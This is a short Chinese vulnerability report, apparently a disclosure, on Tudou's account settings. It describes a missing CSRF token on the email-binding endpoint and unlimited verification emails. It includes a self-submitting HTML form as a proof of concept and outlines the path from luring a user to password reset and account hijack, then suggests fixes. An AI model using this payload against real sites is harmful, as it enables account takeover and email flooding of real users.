这是问题页面~

顺带一个比较糟糕的问题，这里没有设置邮件发送间隔的时间哦，相当于发动技能无cd。

看吧刷屏了，可以做炸弹神马的哦。

言归正传，先抓个包

木有token哦客官。

poc

<html>
<body>
<form id="tudou" name="tudou" action="http://www.tudou.com/my/setting/private.action" method="POST">
<input type="hidden" name="email" value="***@163.com" />
<input type="submit" value="submit" />
</form>
<script>
   document.tudou.submit();
</script>
</body>
</html>

提交后返回一个已发送的页面，其实可以构造的更隐蔽，未进一步深入。

然后就上传页面到服务器，诱惑用户访问，pia一声就会有验证邮件了哦。

更糟糕的是绑定后就可以重置密码了，然后就是劫持账户，然后……
 





修复方案：

加token，增加发邮件的间隔时间，还有土豆的crossdomain.xml设置不当，给跨域提供了可能性，你家优酷的就设置的挺好的